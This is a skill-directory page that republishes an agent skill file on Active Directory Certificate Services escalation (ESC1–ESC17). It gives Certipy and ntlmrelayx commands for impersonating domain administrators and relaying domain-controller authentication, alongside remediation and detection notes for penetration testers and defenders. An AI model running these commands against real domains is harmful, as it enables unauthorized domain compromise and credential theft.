Hashcat Password Recovery Workflow
AgentSecOps/SecOpsAgentKit
Guides authorized password-hash recovery with hashcat for security audits, forensic cases and policy testing, starting with an explicit authorization check before any cracking runs.
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/adcs-attacks .claude/skills/adcs-attacks && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .claude/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacksType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/adcs-attacks .agents/skills/adcs-attacks && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .agents/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/adcs-attacks .cursor/skills/adcs-attacks && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .cursor/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/ADScanPro/Claude-AD.git --path skills/adcs-attacks--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/adcs-attacks .gemini/skills/adcs-attacks && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .gemini/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install ADScanPro/Claude-AD adcs-attacksInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/adcs-attacks .github/skills/adcs-attacks && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .github/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/adcs-attacks .opencode/skills/adcs-attacks && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "adcs-attacks" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/adcs-attacks into .opencode/skills/adcs-attacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "adcs-attacks", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
adcs-attacksActive Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
Adcs Attacks is an agent skill from ADScanPro/Claude-AD. Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k). Use when the target runs a Certificate Authority and you want to find vulnerable certificate templates or CA misconfigurations, request a certificate that impersonates a privileged user, and know the exact certipy command, what each ESC actually checks, the Windows Event IDs that fire, and the remediation. ESC1 and ESC8 are the two you hit most in the field.
Its SKILL.md is about 3.6k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Red teaming and adversary simulation, Cryptography and Penetration testing. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.
Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md.
From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
thehacker.recipesFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Adcs Attacks loads about 3.6k tokens when it runs. Until then it costs about 124 tokens; SKILL.md has 1,534 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,534 words, ~3,621 tokens.
.claude/skills/adcs-attacks/SKILL.md (or your agent's skills folder).AD CS is the single richest privilege-escalation surface in modern AD. A misconfigured template or CA lets a low-privileged user obtain a certificate that authenticates as a Domain Admin. This skill uses Certipy (the ly4k project) throughout. You drive it by hand.
The whole thing starts with one enumeration pass. Run it first, read the output, then pick the ESC that applies.
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -stdoutCertipy names each finding by its ESC number, so the tool's output tells you which of the below applies. Save the full JSON/BloodHound output for the report:
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -old-bloodhoundThe generic exploitation pattern, once you know the template/CA: request a cert, then authenticate with it to recover an NT hash or a TGT. -target is the CA/enrollment host and must be an FQDN, not an IP.
certipy req -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 \
-target ca.corp.local -ca CORP-CA -template <VulnTemplate> [attack-specific flags]
certipy auth -pfx administrator.pfx -domain corp.localcertipy auth performs PKINIT and hands you the TGT plus the NT hash of the impersonated account. If it errors with an object SID mismatch, add -sid <target-SID>.
What it checks. A template where low-priv users can enroll, the template has an authentication EKU (Client Authentication / PKINIT / Smart Card Logon), and CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set, meaning the requester chooses the Subject Alternative Name. You put a Domain Admin's UPN in the SAN and get a cert that authenticates as them.
certipy req -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 \
-target ca.corp.local -ca CORP-CA -template VulnUserTemplate -upn administrator@corp.local
certipy auth -pfx administrator.pfx -domain corp.localRemediation. Remove CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT from templates that have an authentication EKU. Require CA manager approval for enrollment. Restrict enrollment permissions.
What it checks. A template with the Any Purpose EKU (or no EKU at all) that low-priv users can enroll in. The resulting certificate can be used for client authentication (and more), so it behaves like ESC1 without the SAN requirement, subject to how the CA maps it.
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template AnyPurposeTemplateRemediation. Define explicit, minimal EKUs; never leave Any Purpose or empty EKU on enrollable templates.
What it checks. A template granting the Certificate Request Agent EKU. You enroll to get an enrollment-agent cert, then use it to request a certificate on behalf of another user.
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template EnrollAgentTemplate
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template User \
-on-behalf-of 'CORP\administrator' -pfx enrollment_agent.pfxRemediation. Restrict who can enroll in enrollment-agent templates; use enrollment-agent restrictions on the CA.
What it checks. You have write access (GenericWrite/WriteDacl/Owner) over the template object itself. You rewrite the template to be ESC1-vulnerable, exploit it, then revert. Certipy automates the flip.
certipy template -u user@corp.local -p 'Password123' -template VulnTemplate \
-save-old -dc-ip 10.0.0.10
# now exploit as ESC1, then restore:
certipy template -u user@corp.local -p 'Password123' -template VulnTemplate \
-configuration VulnTemplate.jsonRemediation. Remove write ACEs on template objects for non-Tier-0 principals.
What it checks. Control over PKI-related AD objects (the CA computer object, the CA's container in the Configuration partition, etc.). Broad; it collapses to whatever the writable object lets you change. Assess and remediate via the same ACL discipline as ESC4.
Remediation. Audit ACLs on the whole CN=Public Key Services configuration container.
What it checks. The CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets a requester specify an arbitrary SAN on any request regardless of the template. It is effectively domain-wide ESC1. (Note: the May 2022 certificate-mapping hardening blunts SAN-only spoofing on patched DCs, but the misconfiguration is still a finding.)
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA \
-template User -upn administrator@corp.localRemediation. Remove the flag: certutil -config "CA\CORP-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, then restart certsvc.
What it checks. You hold the ManageCA or Manage Certificates right on the CA. ManageCA lets you flip CA settings (e.g. enable ESC6) or add yourself as a certificate manager to approve pending requests.
certipy ca -u user@corp.local -p 'Password123' -ca CORP-CA -add-officer user
certipy ca -u user@corp.local -p 'Password123' -ca CORP-CA -enable-template SubCARemediation. Restrict ManageCA/ManageCertificates to Tier-0 CA administrators only.
What it checks. The CA exposes the HTTP(S) web enrollment endpoint (/certsrv/, or the CES/CEP web services) without Extended Protection for Authentication (EPA/channel binding). You coerce a privileged machine account (see the coercion + NTLM relay skill: PetitPotam/PrinterBug) to authenticate to your relay, and relay that NTLM authentication to the web enrollment endpoint to enroll a certificate as the coerced machine. A DC's cert means domain compromise.
Find the relay target:
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -stdout | grep -i "Web Enrollment"Stand up the relay (impacket ntlmrelayx targeting the CES/web-enrollment URL):
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support \
--adcs --template DomainControllerThen coerce a DC to authenticate to your relay host (PetitPotam/Coercer, see coercion skill). Relayed request yields a DC certificate; certipy auth it to a TGT.
Remediation. Enable EPA (channel binding) and require HTTPS on the web enrollment endpoints; disable HTTP. Disable web enrollment if unused. Enforce SMB signing and the NTLM-relay mitigations. Apply the coercion patches.
What it checks. A template with CT_FLAG_NO_SECURITY_EXTENSION set omits the SID security extension. Combined with control over a victim account's userPrincipalName, you rewrite the victim's UPN to a target (e.g. an admin), enroll, then restore. The cert maps to the target because the SID binding is missing. Relevant chiefly on DCs configured for the weaker/compatibility certificate-mapping mode.
certipy account update -u user@corp.local -p 'Password123' \
-user victim -upn administrator -dc-ip 10.0.0.10
certipy req -u victim@corp.local -p 'VictimPass' -ca CORP-CA -template ESC9Template
certipy account update -u user@corp.local -p 'Password123' \
-user victim -upn victim@corp.local # restoreRemediation. Do not set CT_FLAG_NO_SECURITY_EXTENSION. Move DCs to Full Enforcement certificate mapping (KB5014754). Restrict who can write userPrincipalName.
What it checks. DC registry mapping is weakened: StrongCertificateBindingEnforcement=0 (Kerberos) or CertificateMappingMethods includes the weak UPN mapping (Schannel). Same UPN-swap idea as ESC9, driven by the mapping weakness rather than the template flag.
Remediation. Set StrongCertificateBindingEnforcement=2 (Full Enforcement) and remove weak CertificateMappingMethods bits (KB5014754).
What it checks. The CA's RPC enrollment interface (ICertPassage) does not require packet privacy (IF_ENFORCEENCRYPTICERTREQUEST disabled), so NTLM authentication can be relayed to it over RPC, the ESC8 idea against the RPC interface instead of the web endpoint.
ntlmrelayx.py -t rpc://ca.corp.local -rpc-mode ICPR -icpr-ca-name CORP-CA \
--adcs --template DomainControllerRemediation. Enforce RPC encryption on the CA (certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST), restart certsvc; apply NTLM-relay mitigations.
What it checks. The CA private key is stored on a YubiHSM whose auth key is kept in a local registry value. An attacker with shell access to the CA (local admin) can recover the HSM auth key and use the CA private key to forge certificates. This is a post-compromise-of-the-CA-host issue, not a remote low-priv path.
Remediation. Protect CA host administrative access as Tier-0; do not store HSM auth material in the registry.
What it checks. A template carries an issuance policy (msDS-OIDToGroupLink) that maps to an AD group. Enrolling in the template yields a certificate that grants the rights of that group. If the linked group is privileged, low-priv enrollment escalates.
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -stdout
# request the flagged template, then authRemediation. Remove msDS-OIDToGroupLink mappings to privileged groups; audit issuance-policy OID links.
What it checks. Write access to a target's altSecurityIdentities, or weak explicit mappings there, lets you bind a certificate you control to a privileged account. It is the explicit-mapping analogue of the ESC9/ESC10 implicit-mapping abuses.
Remediation. Restrict write access to altSecurityIdentities; use strong mapping values (Issuer+Serial, SKI), not weak ones (email/UPN only).
What it checks. On version-1 templates, a requester can inject arbitrary application policies into the CSR, adding a Client Authentication capability the template did not grant. It revives ESC1-style abuse on templates that looked safe.
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template WebServer \
-application-policies 'Client Authentication' -upn administrator@corp.localRemediation. Apply the CVE-2024-49019 patch. Retire schema-version-1 templates; restrict enrollment.
What it checks. The CA is configured to omit the SID security extension on all issued certificates (the szOID_NTDS_CA_SECURITY_EXT OID sits in the CA's disabled-extensions list). This makes ESC9-style UPN-swap abuse work domain-wide regardless of template flags.
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -stdout # flags ESC16Remediation. Remove the OID from the CA's DisableExtensionList; move DCs to Full Enforcement mapping.
What it checks. The newest class in the Certipy family, covering weak issuance/mapping in hybrid AD CS-to-cloud certificate flows. Certipy's find reports it when present. Treat it like the mapping-weakness classes: assess what the issued cert can authenticate as, and whether a low-priv principal can obtain it.
Remediation. Enforce strong mapping and minimal EKUs on any template feeding hybrid/cloud authentication; audit the trust.
Where to spend time. In the field ESC1 (enrollee-supplied SAN) and ESC8 (relay to web enrollment) are by far the most common wins. ESC6, ESC9/ESC10/ESC16 (mapping weaknesses) and ESC15 (EKUwu) show up on unpatched or legacy CAs. The rest depend on specific ACL or CA-config misconfigurations that certipy find -vulnerable surfaces for you.
Detection (Event IDs).
Baseline remediation across all ESCs.
certipy find -vulnerable yourself and remediate every flagged template before an attacker does.Only test CAs you are authorized to assess. Use lab/generic CA names, templates and UPNs in write-ups, never a client's real values.
© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/adcs-attacks of ADScanPro/Claude-AD.
Open the folder on GitHubat commit 73efec5
Adcs Attacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Adcs Attacks this skillADScanPro/Claude-AD | 209 | — | ~3.6k | Automated safety check: Pass | MIT | |
| Hashcat Password Recovery WorkflowAgentSecOps/SecOpsAgentKit | 219 | 1 repos | ~3.3k | Automated safety check: Notes | Custom licence | |
| Senior Securitydavila7/claude-code-templates | 32k | 2 repos | ~1.1k | Automated safety check: Notes | MIT | |
| Cybersecurityohmyjahh/xquads-squads | 276 | — | ~895 | Automated safety check: Pass | MIT | |
| Detecting T1548 Abuse Elevation Control Mechanismmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~1.5k | Automated safety check: Notes | Apache-2.0 | |
| Exploiting Vulnerabilities With Metasploit Frameworkmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~1.9k | Automated safety check: Notes | Apache-2.0 |
AgentSecOps/SecOpsAgentKit
Guides authorized password-hash recovery with hashcat for security audits, forensic cases and policy testing, starting with an explicit authorization check before any cracking runs.
davila7/claude-code-templates
Comprehensive security engineering skill for application security, penetration testing, security architecture, and compliance auditing.
ohmyjahh/xquads-squads
Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…
mukul975/Anthropic-Cybersecurity-Skills
Detect abuse of elevation control mechanisms (T1548), including Windows UAC bypass via auto-elevating binaries like fodhelper.exe and Linux sudo/setuid/setgid exploitation, by monitoring registry…
mukul975/Anthropic-Cybersecurity-Skills
Uses the Metasploit Framework (msfconsole and its exploit, auxiliary, and post-exploitation modules) to validate that identified CVEs and vulnerabilities are actually exploitable, gather…
mukul975/Anthropic-Cybersecurity-Skills
Detect cyber attacks on OT historian servers (OSIsoft PI, Ignition, GE Proficy, Wonderware InSQL) using a Python detector that flags unauthorized queries, data manipulation, and lateral-movement…
ADScanPro/Claude-AD
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
ADScanPro/Claude-AD
The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…
ADScanPro/Claude-AD
Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.
ADScanPro/Claude-AD
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
ADScanPro/Claude-AD
A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.
Categories
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k). Adcs Attacks is an agent skill from ADScanPro/Claude-AD. Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
Adcs Attacks fits situations like: the target runs a Certificate Authority and you want to find vulnerable certificate templates; CA misconfigurations; request a certificate that impersonates a privileged user; know the exact certipy command.
Run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a claude-code`. Or copy the skill folder (skills/adcs-attacks in ADScanPro/Claude-AD) into .claude/skills/adcs-attacks in your project. Claude Code loads it when a task matches its description.
Run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a codex`. Or copy the skill folder (skills/adcs-attacks in ADScanPro/Claude-AD) into .agents/skills/adcs-attacks in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/adcs-attacks, .gemini/skills/adcs-attacks, .github/skills/adcs-attacks and .opencode/skills/adcs-attacks in your project.
SKILL.md names no scripts, command-line tools or credentials: Adcs Attacks is instructions for the agent only.
SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Adcs Attacks is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 3.6k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Adcs Attacks: Hashcat Password Recovery Workflow (AgentSecOps/SecOpsAgentKit, 219 stars), Senior Security (davila7/claude-code-templates, 32k stars), Cybersecurity (ohmyjahh/xquads-squads, 276 stars) and Detecting T1548 Abuse Elevation Control Mechanism (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 209 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.
Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.